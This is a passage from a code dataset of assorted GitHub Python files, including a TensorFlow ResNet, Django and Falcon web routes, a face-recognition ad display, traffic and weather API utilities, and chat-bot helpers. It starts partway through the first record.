tf.layers.conv2d(relu_1, filters=filters_num, 
kernel_size=kernel_size, padding='SAME',\n use_bias=False)\n bn_2 = batch_norm(conv_2, training)\n residual = tf.add(shortcut, bn_2)\n\n relu_2 = tf.nn.relu(residual)\n return tf.identity(relu_2, name=name)\n\n\ndef build_small_resnet(input, classes_count, training):\n \"\"\"Builds a small resnet model for predicting classes in training or productive mode\n Args:\n input: Tensor that represents input batch. Schema: [NHWC]\n classes_count: Number of classes that should be predicted through this model\n training: Boolean for training (True) or productive usage\"\"\"\n\n with tf.variable_scope('Small_ResNet'):\n # input size 224x224x3\n # output size 112x112x32\n first_conv = tf.layers.conv2d(input, filters=32, kernel_size=7, padding='SAME', strides=2, name=\"First_Conv\")\n first_bn = batch_norm(first_conv, training)\n first_relu = tf.nn.relu(first_bn)\n\n # output size 56x56x32\n max_pool = tf.layers.max_pooling2d(first_relu, pool_size=3, strides=2, padding='SAME', name=\"Max_Pooling\")\n\n # output size 56x56x32\n res_unit_1 = residual_unit(max_pool, filters_num=32, kernel_size=3, training=training, name=\"ResUnit_1\")\n res_unit_2 = residual_unit(res_unit_1, filters_num=32, kernel_size=3, training=training, name=\"ResUnit_2\")\n\n # output size 28x28x64\n res_unit_3 = residual_unit(res_unit_2, filters_num=64, kernel_size=3, training=training, name=\"ResUnit_3\")\n res_unit_4 = residual_unit(res_unit_3, filters_num=64, kernel_size=3, training=training, name=\"ResUnit_4\")\n\n # output size 14x14x128\n res_unit_5 = residual_unit(res_unit_4, filters_num=128, kernel_size=3, training=training, name=\"ResUnit_5\")\n\n # output size 1x1x128\n avg_pool = tf.layers.average_pooling2d(res_unit_5, pool_size=14, padding='VALID', strides=1, name=\"Avg_Pooling\")\n reshaped = tf.reshape(avg_pool, [-1, 128])\n logits = tf.layers.dense(inputs=reshaped, units=classes_count, name=\"Logits\")\n\n return logits\n\n","repo_name":"tkrieger/OpenImagesClassifier","sub_path":"OpenImagesClassifier/small_resnet_model.py","file_name":"small_resnet_model.py","file_ext":"py","file_size_in_byte":3888,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"22327786114","text":"import numpy as np\nimport scipy.linalg\nimport scipy.optimize\n\n\ndef predict_spectrum(ages):\n \"\"\"\n This comes from the `age_modeling.R` script from Wang et al.\n \"\"\"\n alpha = np.array([13.830321, 15.180457, 14.056053, 13.923672, 13.952551, 14.947698])\n beta0 = np.array([-0.316633, -0.327940, -0.322887, -0.329628, -0.321475, -0.326378])\n beta1 = np.array([0.252819, 0.265539, 0.249886, 0.264401, 0.262430, 0.256306])\n p = np.exp(alpha + ages[0] * beta0 + ages[1] * beta1)\n return p / np.sum(p)\n\n\ndef clr(x):\n geom_mean = np.prod(x) ** (1 / len(x))\n return np.log(x / geom_mean)\n\n\ndef cost_func(ages, data, predict_spectrum, proportion=0.1, eur_ages=(22, 22)):\n predicted = (1 - proportion) * predict_spectrum(\n eur_ages\n ) + proportion * predict_spectrum(ages)\n predicted /= predicted.sum()\n dist = scipy.linalg.norm(clr(predicted) - clr(data))\n return dist\n\n\n# observed inferred ages (at 10k gens ago)\nobs_ages = (28, 23)\neur_ages = (20, 20)\n\n# proportion of spectrum from ghost lineage\nproportion = 0.1\n\ndata = predict_spectrum(obs_ages)\nargs = (data, predict_spectrum, proportion, eur_ages)\n\nret = scipy.optimize.fmin_l_bfgs_b(\n cost_func, (30, 30), args=args, approx_grad=True, bounds=[[10, 200], [10, 
200]]\n)\n\nprint(ret[0])\n","repo_name":"apragsdale/dated-mutation-spectra","sub_path":"fit_structured_ages.py","file_name":"fit_structured_ages.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"38522269372","text":"# This urls file has:\n# - userena's urlpatterns\n# - our urlpatterns which override userena's urlpatterns\n# - other accounts-related urls\n\nfrom django.conf.urls.defaults import patterns, url, include\nfrom accounts import views as accounts_views\nfrom userena import views as userena_views\n\nurlpatterns = patterns('',\n\n # Overriding userena urlpatterns\n url(r'^signin/$', userena_views.signin,\n {'template_name': 'userena/signin_form.html'},\n name='signin'),\n url(r'^signup/$', accounts_views.user_add,\n name='signup'),\n \n url(r'^emailall/$', accounts_views.email_all,\n name='emailall'),\n # Include userena urls after our urls, so ours take precedence\n (r'', include('userena.urls')),\n)\n","repo_name":"DevangS/CoralNet","sub_path":"accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"29"} +{"seq_id":"43021299841","text":"import random\n\nimport face_recognition\nimport cv2\nimport os\nimport numpy as np\n\ndef getAdImages(nameList):\n adImg = []\n for i in nameList:\n # print(i, f'ads/{i}.jpg')\n curImg = cv2.imread(f'ads/{i}.jpg')\n adImg.append(curImg)\n return adImg\n\nkidsAdNames = ['pororo']\nyoungAdNames = ['pororo', 'extreme_sports', 'interior_renovation', 'cigarette']\nseniorAdNames = ['interior_renovation', 'insurance', 'cigarette']\nkidsAd = getAdImages(kidsAdNames)\nyoungAd = getAdImages(youngAdNames)\nseniorAd = getAdImages(seniorAdNames)\n\n\npath = 'faces'\nfiles = [dir for dir in os.listdir(path) if not dir.startswith('.')]\nknownNames = []\nknownList = []\nfor i in files:\n curImg = cv2.imread(f'{path}/{i}')\n encode = face_recognition.face_encodings(curImg)[0]\n knownList.append(encode)\n knownNames.append(os.path.splitext(i)[0].split('.')[0])\n\n\nmatchName = knownNames[0]\ncap = cv2.VideoCapture(0)\nwhile True:\n success, img = cap.read()\n imgSmall = cv2.resize(img, (0, 0), None, 0.25, 0.25)\n imgSmall = cv2.cvtColor(imgSmall, cv2.COLOR_BGR2RGB)\n\n facesCurFrame = face_recognition.face_locations(imgSmall)\n encodeCurFrame = face_recognition.face_encodings(imgSmall, facesCurFrame)\n\n for encodeFace, faceLoc in zip(encodeCurFrame, facesCurFrame):\n faceDis = face_recognition.face_distance(knownList, encodeFace)\n matchIndex = np.argmin(faceDis)\n matchName = knownNames[matchIndex]\n\n y1, x2, y2, x1 = faceLoc\n y1, x2, y2, x1 = y1 * 4, x2 * 4, y2 * 4, x1 * 4\n cv2.rectangle(img, (x1, y1), (x2, y2), (0, 255, 0), 2)\n cv2.rectangle(img, (x1, y2 - 35), (x2, y2), (0, 255, 0), cv2.FILLED)\n cv2.putText(img, matchName, (x1 + 6, y2 - 6), cv2.FONT_HERSHEY_PLAIN, 1, (255, 255, 255), 2)\n\n\n if matchName == 'kids':\n cv2.imshow('Ad', kidsAd[random.randrange(len(kidsAd))])\n elif matchName == 'young':\n cv2.imshow('Ad', youngAd[random.randrange(len(youngAd))])\n else:\n cv2.imshow('Ad', seniorAd[random.randrange(len(seniorAd))])\n\n cv2.imshow('Webcam', img)\n key = cv2.waitKey(1) & 0xFF\n\n if key == ord('q'):\n 
break\n\n\n","repo_name":"yimethan/computer_vision_study","sub_path":"face-recog/face_recog_age/ad_expose/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2145,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"899851369","text":"\"\"\"\nFile for data recording utilities\n\"\"\"\nfrom typing import List\nimport requests\nimport tensorflow_hub as hub\nimport tensorflow as tf\nimport streamlink\nimport sys\nimport cv2\nfrom os.path import dirname\nfrom params_and_keys import *\n\nsys.path.insert(0,dirname(dirname(__file__)))\nfrom predictor.detect_cars import model_predict\n\nmodule_handle = \"https://tfhub.dev/google/faster_rcnn/openimages_v4/inception_resnet_v2/1\"\ndetector = hub.load(module_handle).signatures['default']\nstreams = streamlink.streams(LINK)\n\ndef record_and_store(streams = streams) -> None:\n \"\"\"Records and stores the frames of the video\n \"\"\"\n cap = cv2.VideoCapture(streams[\"best\"].url)\n _, frame = cap.read()\n cv2.imwrite('dataset/frame.jpg', frame)\n\n\n### API part ##################################################\ndef extract_weather_info(weather_api_response: dict[str, float]) -> list[str]:\n \"\"\"Extract info from the weather API response\n \"\"\"\n weather_part = weather_api_response.get(\"weather\", WEATHER_ERROR_WEATHER)[0]\n weather_main, weather_desc = weather_part[\"main\"], weather_part[\"description\"]\n\n temp_data = weather_api_response.get(\"main\", WEATHER_ERROR_TEMP)\n temp, feels_like, temp_min, temp_max, pressure, humidity = temp_data.values()\n\n visibility = weather_api_response.get(\"visibility\", WEATHER_ERROR_VISIBILITY)\n\n wind_info = weather_api_response.get(\"wind\", WEATHER_ERROR_WIND)\n wind_speed, wind_angle= wind_info.get('speed',None),wind_info.get('deg',None)\n\n cloud_info = weather_api_response.get(\"clouds\", WEATHER_ERROR_CLOUD)\n clouds = cloud_info[\"all\"]\n\n total_info = [weather_main, weather_desc, temp, feels_like, temp_min, temp_max,\n pressure, humidity, visibility, wind_speed, wind_angle, clouds]\n\n return total_info\n\n\ndef extract_traffic_info(traffic_api_response: dict[str, float]) -> list[str]:\n \"\"\"Extract info from the traffic API response\n \"\"\"\n\n incidents = traffic_api_response.get(\"incidents\", None)\n if incidents:\n maximum_severity = max([incident.get(\"severity\", 0) for incident in incidents])\n total_impacting = sum([incident.get(\"impacting\", 0) for incident in incidents])\n total_delays_free_flow = sum([incident.get(\"delayFromFreeFlow\", 0) for incident in incidents])\n total_delays_typical = sum([incident.get(\"delayFromTypical\", 0) for incident in incidents])\n else:\n return [None, None, None, None]\n\n return [maximum_severity, total_impacting, total_delays_free_flow, total_delays_typical]\n\n\ndef call_apis(LAT=LAT_TIMES, LONG=LONG_TIMES, box_left=LEFT_TIMES,\n box_up=UP_TIMES, box_right=RIGHT_TIMES, box_down=DOWN_TIMES) -> List[str]:\n \"\"\"Call the extra data apis\n \"\"\"\n weather_call = create_weather_link(LAT, LONG, WEATHER_API_KEY)\n\n traffic_call = create_incidents_link(TRAFFIC_API_KEY, box_left, box_up, box_right, box_down)\n\n weather_info = requests.get(weather_call).json()\n traffic_info = requests.get(traffic_call).json()\n\n weather_info = extract_weather_info(weather_info)\n traffic_info = extract_traffic_info(traffic_info)\n\n for info in traffic_info:\n weather_info.append(info)\n\n all_api_responses = [str(column) for column in weather_info]\n return 
all_api_responses\n\n\n#################################################################\n\ndef model_predictor(img_path, detector):\n \"\"\"Predictions on the stores frames\n \"\"\"\n with tf.device('/CPU:0'):\n return model_predict(img_path, detector)\n\nif __name__ == \"__main__\":\n print(call_apis())\n record_and_store()","repo_name":"anryabrahamyan/Road_Traffic_Prediction","sub_path":"record_camera/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"73725113039","text":"from django.urls import path\n\nfrom .views import PostCreateView, PostDetailView, PostSearchView, PostDeleteView, PostEditView\n\napp_name = 'posts'\nurlpatterns = [\n path('create_post/', PostCreateView.as_view(), name='create'),\n path('post_detail//', PostDetailView.as_view(), name='detail'),\n path('search/', PostSearchView.as_view(), name='search'),\n path('delete//', PostDeleteView.as_view(), name='delete'),\n path('edit//', PostEditView.as_view(), name='edit'),\n]\n","repo_name":"delterr/Posterr","sub_path":"posts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"26999366633","text":"# Python Crash Course: Chapter 10, Eric Matthews, Files and Exceptions\n\n# FileNotFoundError example\nfilename = 'alice.txt'\n\n# comment this section to test working solution.\n# with open(filename, encoding='utf-8') as f:\n# contents = f.read()\n# delete from here down to get error.\n\ntry:\n with open(filename, encoding='utf-8') as f:\n contents = f.read()\nexcept FileNotFoundError:\n print(f\"Sorry, the file {filename} does not exist.\")\n# Move file into same location to split the file text.\nelse:\n # Count the number of words in the title.\n words = contents.split()\n num_words = len(words)\n print(f\"The file {filename} contains {num_words}.\")\n","repo_name":"JAL-code/python_work","sub_path":"files_and_exceptions/alice.py","file_name":"alice.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"72566817678","text":"from .tools import VkuserbotClass\nfrom typing import Dict, Any\nimport vkuserbot.user as user\n\n\nclass Longpoll(VkuserbotClass):\n def __init__(self, bot: \"user.User\") -> None:\n self._bot = bot\n bot.loop.run_until_complete(\n self._init_longpoll()\n )\n\n async def _init_longpoll(self) -> None:\n self._longpoll = await self._bot.method(\"messages.getLongPollServer\")\n self._longpoll_url = \"https://\" + self._longpoll[\"server\"]\n self.ts = self._longpoll[\"ts\"]\n\n async def listener(self) -> Dict[str, Any]:\n while True:\n self._longpoll_result = await self._bot.post(self._longpoll_url, {\n \"act\": \"a_check\",\n \"key\": self._longpoll[\"key\"],\n \"ts\": self.ts,\n \"wait\": 1,\n \"mode\": 2,\n \"version\": 3\n })\n self.ts = self._longpoll_result[\"ts\"]\n if \"updates\" not in self._longpoll_result:\n continue\n for update in self._longpoll_result[\"updates\"]:\n self.event = update[0]\n for handle in self._bot._events_to_handle:\n await self._bot._check_handle(handle)\n if self.event != 4:\n continue\n vk_event = await self._bot.method(\n \"messages.getById\", {\"message_ids\": update[1]}\n )\n yield 
vk_event[\"items\"][0]\n","repo_name":"quakedog/vkuserbot","sub_path":"vkuserbot/longpoll.py","file_name":"longpoll.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"27385462249","text":"from imports import *\ncon = connection.Con()\njsons = jsons.jsons()\nrooms = db.Rooms()\ndb = db.Database()\n#csgo = csko.csko()\nto_img = img.Img()\n\n\nclass Test(commands.Cog):\n\n def __init__(self, client):\n self.client = client\n self.tools = tools.Tools(client, jsons)\n\n @commands.command(name='test', hidden=True, aliases=[])\n async def test(self, ctx):\n can = await self.tools.check_role(ctx, 'admin')\n if can:\n guild = ctx.author\n\n\ndef setup(client):\n client.add_cog(Test(client))\n","repo_name":"Slayerovec/Projects","sub_path":"Groot/cogs/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"13364472175","text":"from django.urls import path,include\nfrom . import views\n\nurlpatterns = [\n path(\"\",views.Singup_page,name=\"signup_page\"),\n path(\"signup_logic/\",views.Signup_logic,name=\"signup_logic\"),\n path(\"login_page/\",views.Login_page,name=\"login_page\"),\n path(\"login_logic/\",views.Login_logic,name=\"login_logic\"),\n path(\"user_data/\",views.User_data,name=\"user_data\"),\n path(\"get_data/\",views.get_Data,name=\"get_data\"),\n path(\"update/logic/\",views.Update_logic,name=\"update_logic\"),\n path(\"delete_data/\",views.Delete_data,name=\"delete_data\"),\n]\n","repo_name":"ython123/Login-and-registratin-or-crud-operations-","sub_path":"app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"18276664949","text":"import pytest\nfrom APItest.common.ReadExcelData import Readexceldata\nfrom APItest.request_method.requesttest import RequestMethod\n\n\n\n\n\n\nclass TestInteerface:\n da = Readexceldata().paramsexpectdata()\n def setup_class(self):\n self.res = RequestMethod()\n\n @pytest.mark.parametrize(\"row,expect\", da)\n def test_01(self, row, expect):\n print(expect)\n if expect:\n actual = self.res.get_regular_actual(row)\n print(actual)\n assert expect == actual\n else:\n self.res.get_response(row)","repo_name":"LiuHongCan/MYtemplate","sub_path":"pytestinterface/APItest/Case/test_demo.py","file_name":"test_demo.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"5565091465","text":"from datetime import datetime\nimport elasticsearch\nimport json\nimport falcon\nimport requests\nfrom falcon_auth import FalconAuthMiddleware, BasicAuthBackend\n\nelasticsearch_host = ['52.169.143.2:9200']\n\nhttpauth = {}\nhttpauth['user1'] = \"password\"\nhttpauth['user2'] = \"password\"\n\nclass StatusResource:\n def on_get(self, req, resp):\n\n try:\n es = elasticsearch.Elasticsearch(elasticsearch_host)\n health = es.cluster.health()\n if health['status'] != 'green' or health['status'] != 'yellow':\n resp.status = falcon.HTTP_500\n resp.body = json.dumps(health['status'], ensure_ascii=False)\n resp.status = falcon.HTTP_200\n except elasticsearch.ElasticsearchException:\n resp.media = \"ElasticSearch ConnectionRefusedError\"\n resp.status = falcon.HTTP_500\n\nclass LatestAllResource:\n def on_get(self, req, resp):\n\n if 
req.context['user']['username'] not in httpauth:\n resp.status = falcon.HTTP_401\n return\n\n if req.context['user']['password'] != httpauth[req.context['user']['username']]:\n resp.status = falcon.HTTP_401\n return\n\n try:\n es = elasticsearch.Elasticsearch(elasticsearch_host)\n indices = es.indices.get_alias(\"coining_latest_*\")\n available_coins = []\n for item in indices:\n coin = item.split('coining_latest_')\n available_coins.append(coin[1])\n\n doc = {\n 'available_coins': available_coins\n }\n resp.body = json.dumps(doc, ensure_ascii=False)\n resp.status = falcon.HTTP_200\n \n except elasticsearch.ElasticsearchException:\n resp.media = \"ElasticSearch ConnectionRefusedError\"\n resp.status = falcon.HTTP_500\n\nclass CoinmarketcapCoinResource:\n\n def on_get(self, req, resp, coin):\n\n if req.context['user']['username'] not in httpauth:\n resp.status = falcon.HTTP_401\n return\n\n if req.context['user']['password'] != httpauth[req.context['user']['username']]:\n resp.status = falcon.HTTP_401\n return\n\n query = json.dumps({\n \"query\": {\n \"range\": {\n \"last_updated\": {\n \"gte\": \"now-25h\",\n \"lt\": \"now\"\n }\n }\n },\n \"sort\": [{\"last_updated\": {\"order\": \"asc\"}}],\n \"size\": 1500\n })\n\n try:\n es = elasticsearch.Elasticsearch(elasticsearch_host)\n result = es.search(index=\"coinmarketcap_\"+str(coin), doc_type=\"coinmarketcap\", body=query)\n except elasticsearch.ElasticsearchException:\n resp.media = \"ElasticSearch ConnectionRefusedError\"\n resp.status = falcon.HTTP_500\n\n resp.body = json.dumps(result, ensure_ascii=False)\n resp.status = falcon.HTTP_200\n\nclass CoinmarketcapUpdateResource:\n\n def on_get(self, req, resp):\n\n if req.context['user']['username'] not in httpauth:\n resp.status = falcon.HTTP_401\n return\n\n if req.context['user']['password'] != httpauth[req.context['user']['username']]:\n resp.status = falcon.HTTP_401\n return\n\n response = requests.get('https://api.coinmarketcap.com/v1/ticker/?limit=0')\n json_data = json.loads(response.text)\n\n available_coins = ['iota', 'siacoin', 'ethereumclassi', 'verge', 'digibyte', 'ripple', 'zcash', 'bitcoin', 'litecoin', 'waves', 'monacoin', 'ethereum', 'strati', 'komodo', 'ark', 'monero', 'qtum', 'decred', 'bitshare', 'nxt', 'golem', 'vertcoin', 'veritaseum', 'dash', 'ardor', 'nem', 'lisk', 'reddcoin', 'stellar']\n\n for coin in json_data:\n result = {}\n if coin['id'] in available_coins:\n result['id'] = coin['last_updated']\n result['index'] = coin['id']\n result['last_updated'] = datetime.fromtimestamp(int(coin['last_updated'])).astimezone(tz=None).isoformat()\n result['rank'] = int(coin['rank'])\n result['price_usd'] = float(coin['price_usd'])\n result['price_btc'] = float(coin['price_btc'])\n result['24h_volume_usd'] = float(coin['24h_volume_usd'])\n result['market_cap_usd'] = float(coin['market_cap_usd'])\n result['available_supply'] = float(coin['available_supply'])\n result['total_supply'] = float(coin['total_supply'])\n result['max_supply'] = coin['max_supply']\n result['percent_change_1h'] = coin['percent_change_1h']\n result['percent_change_24h'] = coin['percent_change_24h']\n result['percent_change_7d'] = coin['percent_change_7d']\n\n try:\n es = elasticsearch.Elasticsearch(elasticsearch_host)\n es.index(index=\"coinmarketcap_\"+str(result['index']), doc_type=\"coinmarketcap\", id=result['id'], body=result)\n except elasticsearch.ElasticsearchException:\n resp.media = \"ElasticSearch ConnectionRefusedError\"\n resp.status = falcon.HTTP_500\n\n resp.status = 
falcon.HTTP_200\n\nclass LatestCoinResource:\n    def on_get(self, req, resp, coin):\n\n        if req.context['user']['username'] not in httpauth:\n            resp.status = falcon.HTTP_401\n            return\n        if req.context['user']['password'] != httpauth[req.context['user']['username']]:\n            resp.status = falcon.HTTP_401\n            return\n        \n        try:\n            es = elasticsearch.Elasticsearch(elasticsearch_host)\n            result = es.search(index='coining_latest_%s' % (coin), doc_type=\"coining_latest\")\n            \n            if len(result['hits']['hits']) != 1:\n                resp.status = falcon.HTTP_500\n                return\n\n            resp.body = json.dumps(result['hits']['hits'][0]['_source'], ensure_ascii=False)\n            resp.status = falcon.HTTP_200\n\n        except elasticsearch.ElasticsearchException:\n            resp.media = \"ElasticSearch ConnectionRefusedError\"\n            resp.status = falcon.HTTP_500\n\n\n    def on_post(self, req, resp, decision, coin, last_upd):\n        print(\"storing decision for\", coin)\n        doc_type = \"coining\"\n        index = doc_type + \"_\" + coin\n        id = int(last_upd.tolist() / 1e9)\n\n        latest_doc_type = \"coining_latest\"\n        latest_index = latest_doc_type + \"_\" + coin\n\n        last_upd = datetime.fromtimestamp(id)\n        body = {\n            \"currency\": coin,\n            \"last_updated\": last_upd,\n            **decision\n        }\n        d = dict(index=index, doc_type=doc_type, id=id, body=body)\n        d_latest = dict(index=latest_index, doc_type=latest_doc_type, id=1, body=body)\n        print(d)\n        print(d_latest)\n        #self.es.index(**d)\n        #self.es.index(**d_latest)\n        resp.status = falcon.HTTP_200\n\nuser_loader = lambda username, password: { 'username': username , 'password': password }\nauth_backend = BasicAuthBackend(user_loader)\n\nauth_middleware = FalconAuthMiddleware(auth_backend,exempt_routes=['/api/status'])\napi = falcon.API(middleware=[auth_middleware])\napi.add_route('/api/status', StatusResource())\napi.add_route('/api/latest/all', LatestAllResource())\n\n# Get Latest / Post Latest from AI\napi.add_route('/api/latest/{coin}', LatestCoinResource())\n\n# Get Latest / Post Latest from coinmarketcap\napi.add_route('/api/coinmarketcap/{coin}', CoinmarketcapCoinResource())\napi.add_route('/api/coinmarketcap/update', CoinmarketcapUpdateResource())\n\n","repo_name":"arenstar/neuro-api","sub_path":"neuro.py","file_name":"neuro.py","file_ext":"py","file_size_in_byte":7647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"10171692257","text":"num = int(input('Digite um valor numerico decimal aqui: '))\nescolha = int(input('Escolha para qual base deseja converter o valor numerico:'\n                    '\\n (1) Binario\\n (2) Octal\\n (3) Hexadecimal\\nSua Escolha: '))\nif escolha == 1:\n    print('O numero {} em binario é {}'.format(num, bin(num)[2:]))\nelif escolha == 2:\n    print('O número {} em Octal é {}'.format(num, oct(num)[2:]))\nelif escolha == 3:\n    print('O número {} em Hexadecimal é {}'.format(num, hex(num)[2:]))\nelse:\n    print('Escolha uma opção 
valida!')\n","repo_name":"talessantos49/Primeiros_Passos","sub_path":"Cursos-Extras/Python/ex037.py","file_name":"ex037.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"22563473158","text":"from re import L\nimport sys\n\nsys.stdin = open(\"_소득불균형.txt\")\n\nt = int(input()) #테스트 케이스\n\nfor i in range(t): \n n = int(input())\n lst = list(map(int,input().split())) #리스트로 받기\n sum_= sum(lst) #합 계산\n total = len(lst) #리스트 길이 개수로 받음\n avg = sum_/total\n lst2 = [] #빈 리스트\n for j in range(len(lst)):\n if avg >= lst[j]: #평균보다 리스트의 값이 작거나 같으면\n lst2.append(j) #빈 리스트에 추가\n print(f'#{i+1} {len(lst2)}') #lst2의 길이 = 사람 수\n","repo_name":"rhoeunbin/01-PJT-03","sub_path":"2회차/노은빈/1_소득불균형.py","file_name":"1_소득불균형.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"ko","doc_type":"code","dataset":"github-code","pt":"29"} +{"seq_id":"4524230938","text":"def fibSuma():\r\n\tn1=0\r\n\tn2 =1\r\n\tsuma =0\r\n\tprint(\"Calculando....\")\r\n\tfor x in range(0, 99):\r\n\t\ttotal = n1 + n2\r\n\t\tif total > 99:\r\n\t\t\tbreak\r\n\t\telif total <= 99:\r\n\t\t\tsuma += total\r\n\t\t\tprint(\"Sumando\\t[ \",n1,\" + \", n2,\" ] = [ \",total, \" ] \\t Acumulando -->[ \",suma, \" ]\")\r\n\t\t\tn1 = n2\r\n\t\t\tn2 = total\r\n","repo_name":"carlosgm128/python","sub_path":"FibSuma.py","file_name":"FibSuma.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"17999944647","text":"import pandas as pd\nimport gmplot\nfrom os import path\nimport psycopg2\nimport os\nimport reverse_geocode\nfrom geopy.geocoders import Nominatim\nimport threading\nimport folium\nfrom folium.plugins import HeatMap\nimport ast\n\n\nfrom IPython.display import display\n\ndef run_query(query):\n try:\n connection = psycopg2.connect(user = \"\",\n password = \"\",\n host = \"\",\n port = \"5432\",\n database = \"\")\n\n cursor = connection.cursor()\n cursor.execute(query)\n rows = cursor.fetchall()\n return rows\n except (Exception, psycopg2.Error) as error :\n print (\"Error while connecting to PostgreSQL\", error)\n finally:\n #closing database connection.\n if(connection):\n cursor.close()\n connection.close()\n print(\"PostgreSQL connection is closed\")\n\n# def make_heatmap_ghtorrent():\n# query='''\n# SELECT long, lat\n# FROM users\n# WHERE (long IS NOT NULL AND long != 0) AND lat IS NOT NULL\n# LIMIT 500000\n# '''\n\n# rows = run_query(query)\n# [longitudes, latitudes] = [[ i for i, j in rows ], [ j for i, j in rows ]]\n# gmap = gmplot.GoogleMapPlotter(34.0522, -118.2437, 0)\n# gmap.heatmap(latitudes, longitudes)\n# gmap.draw(\"user_heatmap.html\")\n\ndef geocode(location, count, f):\n try:\n geolocator = Nominatim(timeout=100, user_agent='github_heatmap')\n location = geolocator.geocode(location)\n print(str([location, count, location.latitude, location.longitude]))\n f.write(str([location, count, location.latitude, location.longitude]) + '\\n')\n except:\n pass\n\n\ndef get_coordinates():\n query='''\n\tSELECT location, COUNT(*) as count\n\tFROM github_users\n\tWHERE \n\t\t(location IS NOT NULL and location !='null') AND\n\t\tLOWER(location) NOT LIKE '%india%' AND\n\t\tLOWER(location) NOT LIKE '%china%'\n\tGROUP BY location\n\tHAVING COUNT(*) > 100 AND COUNT(*) < 111\n\tORDER BY count DESC\n '''\n\n rows = run_query(query)\n geolocator = Nominatim(timeout=100, user_agent='github_heatmap')\n\n f = 
open(\"coordinates.txt\",\"a\")\n for row in rows:\n thread = threading.Thread(target=geocode, args=(row[0], row[1], f,))\n thread.start()\n thread.join()\n f.close()\n\ndef get_coordinates_excluded():\n query='''\n SELECT location, COUNT(*) as count\n FROM github_users\n WHERE \n (location IS NOT NULL and location !='null') AND\n LOWER(location) LIKE '%india%' OR\n LOWER(location) LIKE '%china%'\n GROUP BY location\n HAVING COUNT(*) > 100\n ORDER BY count DESC\n '''\n\n # rows = run_query(query)\n f = open(\"rows.txt\", \"r\")\n rows = ast.literal_eval(f.read().strip())\n\n geolocator = Nominatim(timeout=100, user_agent='github_heatmap')\n\n f = open(\"coordinates_excluded.txt\",\"a\")\n for row in rows:\n thread = threading.Thread(target=geocode, args=(row[0], row[1], f,))\n thread.start()\n thread.join()\n f.close()\n\n\ndef make_heatmap():\n f = open(\"coordinates.txt\", \"r\")\n lines = f.readlines()\n grid = []\n for line in lines:\n grid.append(line.strip().split(', ')[-3:])\n grid = [ [float(j), float(k[:-1]), int(i)] for i, j, k in grid ]\n print(grid)\n hmap = folium.Map(location=[0.0, 0.0], zoom_start=3)\n hm_wide = HeatMap(grid,\n min_opacity=0.2,\n max_val=38000,\n radius=17, blur=15, \n max_zoom=1, \n )\n hmap.add_child(hm_wide)\n hmap.save('heatmap.html')\n\ndef make_heatmap_ghtorrent():\n query='''\n SELECT lat, long, COUNT(*) as count\n FROM users\n WHERE \n (location IS NOT NULL and location !='null')\n AND (lat != 0 AND long != 0)\n GROUP BY lat, long\n HAVING COUNT(*) > 10\n ORDER BY count DESC\n '''\n\n rows = run_query(query)\n grid = [ list(row) for row in rows ]\n hmap = folium.Map(location=[0.0, 0.0], zoom_start=3)\n hm_wide = HeatMap(grid,\n min_opacity=0.2,\n max_val=38000,\n radius=17, blur=15, \n max_zoom=1, \n )\n hmap.add_child(hm_wide)\n hmap.save('heatmap_ghtorrent.html')\n\n\nif __name__ == '__main__':\n make_heatmap_ghtorrent()\n","repo_name":"nealav/github-scraper","sub_path":"heatmap.py","file_name":"heatmap.py","file_ext":"py","file_size_in_byte":4343,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"29"} +{"seq_id":"25940154927","text":"import re\nfrom typing import List\n\nfrom loguru import logger\n\nfrom ..config import plugin_config\nfrom ..model.cache import Cache\nfrom ..model.exception import AbortError\nfrom ..optional import capture_exception # type: ignore\nfrom .openai import get_small_size_transcripts, get_summarise_prompt, openai_req\nfrom .text_to_image import t2i\n\n\nasync def subtitle_summarise(title: str, sub: List[str]):\n small_size_transcripts = get_small_size_transcripts(title, sub)\n prompt = get_summarise_prompt(title, small_size_transcripts)\n logger.debug(prompt)\n return await openai_req(prompt)\n\n\nasync def column_summarise(cv_title: str, cv_text: List[str]):\n small_size_transcripts = get_small_size_transcripts(cv_title, cv_text)\n prompt = get_summarise_prompt(cv_title, small_size_transcripts, type_=\"专栏文章\")\n logger.debug(prompt)\n return await openai_req(prompt)\n\n\nasync def openai_summarization(cache: Cache, cid: str = \"0\"):\n try:\n if not cache.episodes[cid].openai:\n if cache.id[:2].lower() in [\"bv\", \"av\"]:\n ai_summary = await subtitle_summarise(cache.title, cache.episodes[cid].content)\n elif cache.id[:2].lower() == \"cv\":\n ai_summary = await 